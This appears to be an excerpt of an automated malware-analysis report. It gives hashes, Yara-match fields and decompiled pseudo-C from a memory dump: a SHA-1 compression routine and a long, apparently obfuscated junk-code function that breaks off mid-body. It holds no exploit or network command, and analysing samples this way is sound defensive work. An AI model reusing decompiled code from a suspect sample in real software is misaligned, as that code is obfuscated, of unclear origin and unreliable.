                                                        • Opcode ID: 2367e2ebd7d69b7618874dacd5dc7f9c078024edb5495a80f0c4c088b0a358ed
                                                        • Instruction ID: bfa471cf8b2288c100353908c093c8a0c8cd05edc7202a61451fb4f10511930e
                                                        • Opcode Fuzzy Hash: 2367e2ebd7d69b7618874dacd5dc7f9c078024edb5495a80f0c4c088b0a358ed
                                                        • Instruction Fuzzy Hash: A9021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00409E60, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 73%
                                                        			E00409E60(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                                                        0x00409e6b
                                                        0x00409e6f
                                                        0x00409e71
                                                        0x00409e71
                                                        0x00409e74
                                                        0x00409e96
                                                        0x00409ebc
                                                        0x00409ee2
                                                        0x00409f04
                                                        0x00409f0b
                                                        0x00409f0e
                                                        0x00409f11
                                                        0x00409f1a
                                                        0x00409f20
                                                        0x00409f27
                                                        0x00409f38
                                                        0x00409f3b
                                                        0x00409f3e
                                                        0x00409f42
                                                        0x00409f44
                                                        0x00409f46
                                                        0x00409f4f
                                                        0x00409f52
                                                        0x00409f55
                                                        0x00409f60
                                                        0x00409f66
                                                        0x00409f68
                                                        0x00409f68
                                                        0x00409f6b
                                                        0x00409f6e
                                                        0x00409f6e
                                                        0x00409f73
                                                        0x00409f75
                                                        0x00409f78
                                                        0x00409f7b
                                                        0x00409f81
                                                        0x00409f84
                                                        0x00409f87
                                                        0x00409f90
                                                        0x00409f96
                                                        0x00409f9f
                                                        0x00409fae
                                                        0x00409fb5
                                                        0x00409fb8
                                                        0x00409fbb
                                                        0x00409fc4
                                                        0x00409fc7
                                                        0x00409fca
                                                        0x00409fe2
                                                        0x00409fe9
                                                        0x00409feb
                                                        0x00409fee
                                                        0x00409ff1
                                                        0x00409ffa
                                                        0x0040a001
                                                        0x0040a004
                                                        0x0040a007
                                                        0x0040a016
                                                        0x0040a01d
                                                        0x0040a020
                                                        0x0040a023
                                                        0x0040a02c
                                                        0x0040a036
                                                        0x0040a039
                                                        0x0040a045
                                                        0x0040a048
                                                        0x0040a04f
                                                        0x0040a052
                                                        0x0040a055
                                                        0x0040a05a
                                                        0x0040a05d
                                                        0x0040a066
                                                        0x0040a077
                                                        0x0040a07a
                                                        0x0040a07d
                                                        0x0040a084
                                                        0x0040a087
                                                        0x0040a08a
                                                        0x0040a08d
                                                        0x0040a08f
                                                        0x0040a092
                                                        0x0040a095
                                                        0x0040a09e
                                                        0x0040a0a3
                                                        0x0040a0a3
                                                        0x0040a0b8
                                                        0x0040a0bb
                                                        0x0040a0be
                                                        0x0040a0c5
                                                        0x0040a0c8
                                                        0x0040a0cb
                                                        0x0040a0e0
                                                        0x0040a0e7
                                                        0x0040a0ea
                                                        0x0040a0ee
                                                        0x0040a0f1
                                                        0x0040a0f6
                                                        0x0040a0f9
                                                        0x0040a108
                                                        0x0040a10b
                                                        0x0040a112
                                                        0x0040a115
                                                        0x0040a118
                                                        0x0040a11b
                                                        0x0040a11e
                                                        0x0040a126
                                                        0x0040a134
                                                        0x0040a137
                                                        0x0040a13a
                                                        0x0040a13a
                                                        0x0040a141
                                                        0x0040a144
                                                        0x0040a147
                                                        0x0040a14f
                                                        0x0040a15d
                                                        0x0040a160
                                                        0x0040a167
                                                        0x0040a16a
                                                        0x0040a16d
                                                        0x0040a170
                                                        0x0040a173
                                                        0x0040a17c
                                                        0x0040a183
                                                        0x0040a183
                                                        0x0040a189
                                                        0x0040a1a2
                                                        0x0040a1a5
                                                        0x0040a1ac
                                                        0x0040a1af
                                                        0x0040a1b2
                                                        0x0040a1c4
                                                        0x0040a1ce
                                                        0x0040a1d1
                                                        0x0040a1da
                                                        0x0040a1dd
                                                        0x0040a1e4
                                                        0x0040a1e7
                                                        0x0040a1ed
                                                        0x0040a200
                                                        0x0040a207
                                                        0x0040a20a
                                                        0x0040a20d
                                                        0x0040a210
                                                        0x0040a219
                                                        0x0040a21c
                                                        0x0040a22f
                                                        0x0040a232
                                                        0x0040a23c
                                                        0x0040a23f
                                                        0x0040a241
                                                        0x0040a24a
                                                        0x0040a24d
                                                        0x0040a260
                                                        0x0040a266
                                                        0x0040a269
                                                        0x0040a270
                                                        0x0040a272
                                                        0x0040a275
                                                        0x0040a278
                                                        0x0040a27b
                                                        0x0040a27e
                                                        0x0040a281
                                                        0x0040a28a
                                                        0x0040a28f
                                                        0x0040a292
                                                        0x0040a292
                                                        0x0040a2a5
                                                        0x0040a2a8
                                                        0x0040a2ab
                                                        0x0040a2b2
                                                        0x0040a2b5
                                                        0x0040a2b8
                                                        0x0040a2bb
                                                        0x0040a2ce
                                                        0x0040a2d1
                                                        0x0040a2dc
                                                        0x0040a2df
                                                        0x0040a2eb
                                                        0x0040a2ee
                                                        0x0040a2f4
                                                        0x0040a2f7
                                                        0x0040a2fa
                                                        0x0040a301
                                                        0x0040a311
                                                        0x0040a314
                                                        0x0040a31a
                                                        0x0040a31d
                                                        0x0040a324
                                                        0x0040a326
                                                        0x0040a329
                                                        0x0040a32c
                                                        0x0040a32f
                                                        0x0040a332
                                                        0x0040a339
                                                        0x0040a348
                                                        0x0040a34b
                                                        0x0040a352
                                                        0x0040a355
                                                        0x0040a358
                                                        0x0040a35b
                                                        0x0040a35e
                                                        0x0040a361
                                                        0x0040a364
                                                        0x0040a36d
                                                        0x0040a37e
                                                        0x0040a386
                                                        0x0040a38c
                                                        0x0040a38f
                                                        0x0040a391
                                                        0x0040a394
                                                        0x0040a397
                                                        0x0040a3a4

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (
                                                        • API String ID: 0-3887548279
                                                        • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                        • Instruction ID: 5e5443ef098d349f7e33f9aecf6f08398bbbeee53fd6575e54cb3400f46edf1b
                                                        • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                        • Instruction Fuzzy Hash: C7021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041DB34, Relevance: 1.6, Strings: 1, Instructions: 380COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 53%
                                                        			E0041DB34() {
				void* _t47;
				signed int _t48;
				void* _t49;
				void* _t51;
				void* _t52;

				 *0x83e375da =  *0x83e375da << 0xe6;
				asm("ror dword [0xe961c38f], 0x12");
				_t48 = _t47 - 0xa;
				_t51 = _t49;
				if(( *0xb59dc181 & 0x3839676d) <= 0) {
					__edx =  *0x8af817f * 0x1d61;
					asm("rcr dword [0x6f963b83], 0xee");
					__cl =  *0xe711fce3;
					asm("sbb esp, [0x63374ad5]");
					_push( *0x431a49f1);
					__edi = __edi + 1;
					__esi = __esi ^  *0x36282f3;
					 *0x14cba318 =  *0x14cba318 << 0x59;
					__ebx = __ebx +  *0x248ba70d;
					__ch = __ch & 0x000000a0;
					_pop(__esi);
					 *0x2a99e713 =  *0x2a99e713 << 0xbc;
					asm("adc edx, 0x985d478e");
					__edx = 1 +  *0x8af817f * 0x1d61;
					__edi = __edi - 1;
					asm("rol byte [0xc26a50e7], 0x86");
					 *0xc8b71865 =  *0xc8b71865 + __eax;
					__eax = __eax +  *0xbc6442e;
					asm("adc edx, [0xfa22c129]");
					__esp =  *0x6af946b * 0xd1d2;
					 *0x1ef4ec0c =  *0x1ef4ec0c << 0x27;
					__esp =  *0x6af946b * 0x0000d1d2 |  *0x5b777126;
					asm("rcl dword [0x737f9c94], 0xed");
					 *0x297a07e7 =  *0x297a07e7 | __ah;
					 *0xfaa96823 = __ecx;
					 *0x12c91698 =  *0x12c91698 - __eax;
					asm("adc edi, [0x96c35121]");
					__ecx =  *0x4ba9a9f7;
					if(__eax >=  *0x22ec4dde) {
						asm("adc esp, 0x89bc8270");
						__esp = __esp |  *0xb92856d5;
						asm("sbb [0xdc7b8311], esp");
						_pop(__esi);
						__edi = 0xd70eaed4;
						 *0x3873b7b9 =  *0x3873b7b9 << 0xc4;
						 *0x1cdb1ccb =  *0x1cdb1ccb << 0xaf;
						_t13 = __edx;
						__edx =  *0x1a48f9f3;
						 *0x1a48f9f3 = _t13;
						asm("rol dword [0xc73655c1], 0xaa");
						_pop(__ecx);
						if(( *0xfb0958d & __eax) == 0) {
							__ecx = __ecx | 0x6d322d7a;
							 *0x4b7adf08 =  *0x4b7adf08 >> 0xe;
							__ebx = __ebx - 1;
							asm("sbb edx, [0xc92bef9f]");
							 *0x39d02110 = __bl;
							 *0xeed84607 =  *0xeed84607 << 0x3a;
							asm("adc [0x23784310], al");
							 *0x46af86b1 =  *0x46af86b1 << 0x91;
							__esp = __esp ^  *0x54d32268;
							_push( *0xc836dfb9);
							asm("sbb [0x613cf9dd], ecx");
							__esp = 0xc6ed21;
							__bl = __bl + 0x28;
							asm("rcr dword [0xea69db2f], 0xc");
							__esp =  *0x7677dd21;
							 *0xa75730f2 =  *0xa75730f2 & __dh;
							_pop(__edx);
							_t16 = __dl;
							__dl =  *0x9f550400;
							 *0x9f550400 = _t16;
							__dh = __dh ^  *0xef345138;
							 *0xbb025df6 =  *0xbb025df6 | __dl;
							__ebp = __ebp & 0xa898f789;
							_push( *0xf4203761);
							__al = __al -  *0x6151f2b4;
							 *0x2bab1564 =  *0x2bab1564 >> 0xfb;
							__ebx = __ebx &  *0x344a4f91;
							__al = __al ^ 0x0000002a;
							asm("adc edx, 0x583b8e26");
							asm("rcl byte [0x39604186], 0x69");
							__al =  *0x699d3ae1;
							 *0xe8090bf2 =  *0xe8090bf2 << 0xb0;
							_push( *0x47b78867);
							__esi = __esi + 0x250e02f5;
							__esp =  *0x7677dd21 -  *0x612741eb;
							 *0x7702e0cc =  *0x7702e0cc << 0x33;
							__ebp = 0x14f2af9d;
							if( *0x7702e0cc > 0) {
								__eax =  *0x2d7e117e * 0xcf40;
								__edi = 0xf014a90b;
								 *0xa3c99ae1 =  *0xa3c99ae1 & __dh;
								__edi = 0xddf8548e;
								__esp = __esp & 0x90f719cb;
								__ebx = __ebx -  *0xcf0ca321;
								_push(__esi);
								asm("sbb edi, [0x1c6dd7f7]");
								asm("rol dword [0x7e6e1c1b], 0xf9");
								L1();
								__edx = __edx +  *0x5d2a92e8;
								__eax = 1 +  *0x2d7e117e * 0xcf40;
								__ecx = __ecx &  *0x9c0b2916;
								if(__ecx == 0) {
									__esp = __esp +  *0x43803775;
									asm("lodsb");
									__edx = __eax;
									 *0x377ef599 =  *0x377ef599 ^ __esp;
									_pop( *0xd22a4cd4);
									__edx = __edx + 1;
									__esi = __esi + 0x56caa2fa;
									asm("adc [0x1ea6c3e4], dl");
									__esp = __esp + 1;
									__ebx = __ebx - 0xb106a8bb;
									 *0xecd18b9d =  *0xecd18b9d << 0x15;
									 *0x86a8dd9e =  *0x86a8dd9e >> 0x74;
									__ebx = __ebx + 1;
									__ah = __ah +  *0x7bdfd408;
									asm("sbb ah, 0x84");
									 *0xfce480e2 =  *0xfce480e2 & __dh;
									asm("adc ebp, [0x100b430f]");
									__ebp = 0x14f2af9e;
									 *0x8a898f8c =  *0x8a898f8c - 0x14f2af9d;
									__eax = __eax + 0x1159c533;
									 *0xd91384a2 =  *0xd91384a2 + __cl;
									asm("sbb [0x90ebb91e], esi");
									 *0xb1e82c18 =  *0xb1e82c18 >> 0x2f;
									__eax = __eax - 1;
									asm("adc edx, 0xcb9bb025");
									__edi = 0xc97fa9d;
									asm("adc ecx, [0x8a58b03d]");
									asm("adc esi, 0x6ad0642b");
									asm("sbb ebp, [0x5d85f413]");
									__esp = __esp |  *0x94d300f5;
									__edi = 0x17b355b6;
									asm("ror byte [0x2c76ff63], 0x95");
									if(0xddf8548e < 0) {
										 *0xf53e7573 =  *0xf53e7573 + __ecx;
										__edx = __edx & 0xd93f80cc;
										if(__edx <= 0) {
											__eax =  *0x59ad2a7f * 0x7f11;
											_pop(__ebx);
											0x17b355b7 =  *0x73497860 * 0xd105;
											asm("sbb ah, 0xe3");
											asm("sbb [0xfcba317], edx");
											asm("ror byte [0x49c0c738], 0x5a");
											 *0x459b2680 = __dl;
											 *0x8a89976e =  *0x8a89976e & __ecx;
											_pop( *0x1759c533);
											asm("adc edi, 0x8e4562dd");
											 *0x80f94d22 =  *0x80f94d22 ^ __al;
											if( *0x80f94d22 >= 0) {
												 *0x8f372f72 =  *0x8f372f72 << 5;
												__esp =  *0xb832631d;
												__esi = __esi ^  *0xdf2b881;
												__edi =  *0x9d4c3f67;
												asm("adc edx, [0xfd64f719]");
												 *0xae1e6103 = __ecx;
												 *0xd3581012 =  *0xd3581012 >> 0x53;
												asm("sbb [0x369443c8], esi");
												__eax = __eax ^  *0x79f53192;
												__ebx = __ebx +  *0x6faf0331;
												__dl = __dl & 0x00000004;
												_push(__esi);
												__edi =  *0x9d4c3f67 + 0x8efa5c21;
												__ebp = 0x14f2af9d;
												if(0x14f2af9d == 0) {
													__esp = __esp |  *0x8a899475;
													asm("sbb [0xea55f83b], esp");
													__edx = __edx - 1;
													__edi =  *0x36f36c15;
													asm("adc esi, [0x478a98f7]");
													 *0xce4cbcd5 =  *0xce4cbcd5 - __edx;
													__eax = __eax;
													if( *0xce4cbcd5 >= 0) {
														__edx =  *0xf0d127c * 0x8f18;
														_t19 = __ah;
														__ah =  *0x9411100a;
														 *0x9411100a = _t19;
														__esi = __esi - 1;
														__eax = __eax ^ 0x41118e65;
														__ebp = 0x5f3bc887;
														asm("adc [0x46faf03], edx");
														asm("rcr dword [0xc0371d68], 0xea");
														asm("ror byte [0x5224d122], 0x4e");
														__ah =  *0x9411100a ^  *0x5609c12;
														__ch = 0x8a;
														__ecx = __ecx &  *0xfdab3d95;
														__esi = __esi &  *0x14b0c705;
														asm("ror byte [0xb29d682c], 0x99");
														 *0x550fc834 =  *0x550fc834 << 0xf2;
														asm("adc esp, [0x6705781f]");
														__ecx = __ecx + 1;
														asm("rol dword [0xb609270d], 0x48");
														_pop(__ecx);
														asm("lodsd");
														 *0xa80aa833 =  *0xa80aa833 >> 0xe6;
														if( *0xa80aa833 == 0) {
															 *0xdedbaacf =  *0xdedbaacf ^ __eax;
															asm("sbb [0x7910af89], esi");
															_t26 = __esi;
															__esi =  *0x3800c0f3;
															 *0x3800c0f3 = _t26;
															__ebx = __ebx + 0xc1bf29d1;
															__esi =  *0x3800c0f3 | 0xf1112513;
															asm("sbb edi, [0x12680c8e]");
															__ecx = __ecx &  *0x777ced6f;
															 *0x2da875cf =  *0x2da875cf | 0x3839676d;
															if( *0x2da875cf < 0) {
																__esp = __esp -  *0x9a458b79;
																__edx = __edx ^ 0xf67eb667;
																__al = __al & 0x00000010;
																__eax = __eax - 1;
																 *0xaf8b65f9 =  *0xaf8b65f9 << 0x2f;
																 *0x7cde3a10 =  *0x7cde3a10 >> 0x91;
																__eax = __eax &  *0x955bca92;
																if(__eax < 0) {
																	__eax = __eax ^ 0x337df271;
																	__ecx = __ecx & 0x046faf03;
																	__dl =  *0x7fe385b7;
																	asm("adc edi, 0x25fb87d4");
																	asm("rcl dword [0xe051a0eb], 0x6a");
																	if(0x14f2af9d >=  *0x5fd91868) {
																		__ebx = __ebx +  *0x79925572;
																		__ebx = __ebx |  *0xbc53efbd;
																		 *0xd187351d =  *0xd187351d | __edx;
																		if( *0xd187351d >= 0) {
																			 *0x538cd570 =  *0x538cd570 + 0x3839676d;
																			_pop( *0xb10488d6);
																			asm("adc ah, 0xc6");
																			 *0xfca1f418 =  *0xfca1f418 >> 0xae;
																			if(( *0x3df3ff80 & __bl) < 0) {
																				asm("adc eax, 0xda75d579");
																				 *0xd32b91a1 =  *0xd32b91a1 - __edx;
																				asm("sbb ebp, [0x72d34164]");
																				_pop(__edi);
																				 *0xefbb6a10 =  *0xefbb6a10 & __al;
																				_push(0x3839676d);
																				 *0x10472dbc =  *0x10472dbc + __edx;
																				 *0x19677a0 =  *0x19677a0 - __ah;
																				 *0x4079396c =  *0x4079396c << 0xf6;
																				asm("sbb [0x3377ce6], bh");
																				asm("scasd");
																				__esp = __esp &  *0x1568046f;
																				asm("ror dword [0x7926379e], 0xc2");
																				asm("stosb");
																				__edx = __edx |  *0x211b883b;
																				 *0xbb50c599 =  *0xbb50c599 & __esi;
																				if( *0xbb50c599 <= 0) {
																					_t35 = __esi;
																					__esi =  *0x8a30680b;
																					 *0x8a30680b = _t35;
																					_t36 = __edi;
																					__edi =  *0x59072dfe;
																					 *0x59072dfe = _t36;
																					__edi =  *0x59072dfe +  *0xaf9074f5;
																					if(( *0xf9a7e316 & 0x3839676d) == 0) {
																						__esi = __esi ^  *0xcf8de17b;
																						__edi = __edi | 0xa70b6565;
																						__ebp =  *0x91a8eb13;
																						 *0x91a8eb13 = 0x5f3bc887;
																						__eax =  *0x813ed53d;
																						__ebx = __ebx |  *0x11b94b85;
																						 *0xcb0d83b5 =  *0xcb0d83b5 >> 0x4a;
																						asm("sbb [0xb0db1700], al");
																						__eax =  *0x813ed53d - 1;
																						__ebx = __ebx & 0xcb9bb025;
																						asm("sbb edi, 0x61cf2ace");
																						__ebp =  *0x66c1160b;
																						 *0xf32988b7 =  *0xf32988b7 << 0x67;
																						__ebx = __ebx + 0x85f61b68;
																						asm("adc eax, 0xc32ff78c");
																						asm("ror dword [0x20a2df2b], 0x3d");
																						asm("adc eax, [0x1b565fc0]");
																						__eax =  *0x813ed53d - 0x00000001 &  *0xb4eab039;
																						__edi = __edi &  *0xade012ce;
																						__esp = __esp & 0x8d530ec8;
																						 *0xcffd0d93 = __ecx;
																						__esi = __esi |  *0x9505ac2d;
																						__ebx = 0x6df3b7f8;
																						__al = __al - 0x20;
																						asm("lodsd");
																						asm("rcr byte [0x1a900c12], 0x57");
																						if(__al == 0) {
																							__eax = __eax + 0x56a53575;
																							__esp = __esp ^  *0x6162a4c5;
																							 *0x87416e7 =  *0x87416e7 & __ah;
																							 *0xfa7458d4 =  *0xfa7458d4 + __esi;
																							__edx = 0x85e32062;
																							asm("ror byte [0xc3bc1a86], 0xe3");
																							 *0xab94324 = __dh;
																							__esp = __edi;
																							__ecx = __ecx +  *0x6812f919;
																							__edx = 0xffffffff85e32061;
																							_pop( *0x46104981);
																							_t42 = __esp;
																							__esp =  *0x7b1d9217;
																							 *0x7b1d9217 = _t42;
																							__esi = __esi - 1;
																							__ebx = 0x6df3b7f7;
																							__ebp =  *0xe5f92a6a * 0x30b3;
																							__cl = __cl & 0x000000e2;
																							 *0xb832f466 =  *0xb832f466 +  *0x10f2b881;
																							__ecx = 0x2371d7a9;
																							asm("sbb cl, [0xaf03e2ca]");
																							__eax =  *0xb832f466 +  *0x10f2b881 ^ 0x1168046f;
																							asm("rol byte [0x23dbd61a], 0x94");
																							__ebx =  *0x4d850760 * 0x1254;
																							 *0xdd52648b =  *0xdd52648b + 0x2371d7a9;
																							__edi = __edi ^  *0xacba315;
																							asm("rol byte [0x832755d0], 0xe2");
																							_t45 = __al;
																							__al =  *0x77e0ee0a;
																							 *0x77e0ee0a = _t45;
